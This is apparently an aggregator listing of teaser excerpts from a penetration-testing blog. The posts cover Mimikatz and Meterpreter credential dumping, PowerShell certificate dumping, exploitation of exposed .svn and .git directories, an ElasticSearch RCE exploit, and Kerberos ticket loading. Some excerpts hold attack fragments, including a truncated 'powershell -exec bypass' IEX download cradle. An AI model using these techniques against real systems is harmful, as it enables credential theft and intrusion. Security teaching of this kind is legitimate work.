Clik here to view.
MSF's Mimikatz doesnt work on Windows 8.1 what can you do?
So you are on a Windows 8.1 box. You go to run the trusty mimikatz-->wdigest and it fails.Well technically it will work but there wont be anything thereUsing the current mimikatz that ships with...
View ArticleClik here to view.
MSF's + Mimikatz + Windows 8.1 part two
I love twitter. OJ replied to me about my metasploit+mimikatz+Windows 8.1 postLooks like mimikatz 2.0 IS in msf, its just under the use kiwi functionalitymeterpreter > use kiwiLoading extension...
View ArticleMy GoldDigger Script
Awhile back I created a post module that would index various types of file types so I could more quickly find and decide if i wanted to do download potentially useful files.I like to look for the...
View ArticlePowershell dumping all certs in the cert store
Put this on twitter just posting it here so I can find it later.You can use powershell to list all the certificates on a hostpowershell -Command Get-ChildItem -Recurse Cert: > certs.txtIf you are...
View ArticleRunning PowerShell Scripts That Require Module Imports With Meterpreter
Old post on the subject here:http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.htmlMore recent posts on the subject by...
View ArticleClik here to view.
DevOoops: Revision Control (Subversion)
Subversion 1.6 (and earlier)Check for .entries filesWalk svn chain to retrieve sourceExample:http://somedomain.com/.svn/text-base/index.php.svn-basehttp://somedomain.com/.svn/entriesMetasploit...
View ArticleISTS12 Thoughts, Notes, Feedback, Braindump -- Airport Edition
--Airport Edition--Was asked to play on the Red Team for ISTS 12 at Rochester Institute of Technology.The ISTS even runs similarly to the CCDC events, except they all teams to attack each other for...
View ArticlePowerShell-AD-Recon by PyroTek3
Found a couple of fun PowerShell enumeration scripts here:https://github.com/PyroTek3/PowerShell-AD-ReconC:\temp>powershell -exec bypass -Command "IEX (New-Object...
View ArticleElasticSearch CVE-2015-1427 RCE Exploit
References:https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/http://www.theregister.co.uk/...
View ArticleClik here to view.
Metasploit and MSGRPC
I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the...
View ArticleClik here to view.
DevOoops: Revision Control (git)
Exposed git resources is probably the most gruesome low2pwned issues out there right now.Leaving this exposed allows an attacker to potentially download the full source of the site along with any other...
View ArticleClik here to view.
Running System Commands Against Multiple SSH Servers With Metasploit
Want:To run a command against multiple SSH servers and you want to use metasploit to do itHow:There doesn't exist a multi_ssh_exec type aux module to run commands. Luckily ? the ssh_login module...
View ArticleRunning System Commands Against Multiple SSH Servers with Fabric
Fabric is a python library to automate tasksAs the README says:Fabric is a Python (2.5-2.7) library and command-line tool for streamlining the use of SSH for application deployment or systems...
View ArticleLets Call Stunt Hacking What it is, Media Whoring.
Lets Call Stunt Hacking What it is, Media Whoring.by ValsmithI recently read this article:...
View ArticleAnswers on how to get started in Security
I got hit up on twitter and email about how to get started in security by someone. The question was pretty generic and since I didn't even receive a thanks back from the guy I'm sharing it with...
View ArticleAnswers to Questions from the nVisium SecCasts Panel
I was asked to be on on a panel for nVisium's SecCasts. Our episode should be out next week, so spoiler alert...my answers are below:If readers/friends/community want additional details on something...
View ArticleHard to Sprint When You Have Two Broken Legs
Today I saw this article: White House Tells Agencies to Tighten Up Cyber Defenses Immediately.Now as a disclaimer, I don't work for the government so there is a lot I don't know but I have friends who...
View ArticleMetasploit + VHOSTS in mass
maybe this was a solved problem but I couldn't find a solution online.Problem #1:Metasploit RHOSTS takes the file parameter so you can pass in a list of ip ranges. It will also take hostnames as long...
View ArticleDevOps Days DC 2015 Talk Video
Here is good copy of Ken and I's DevOps Days DC talk:"DevOops & How I hacked you"DevOpsDays DC 2015 - 30 - DevOops & How I hacked you - Chris Gates, Facebook & Ken Johnson, nVisium from...
View ArticleClik here to view.
Ways To Load Kerberos Tickets
Everyone is aware of the awesomeness that Mimikatz is and most likely golden tickets. Mimikatz ships with lots of kerberos functionality. Just wanted to jot down some quick notes on using these...
View Article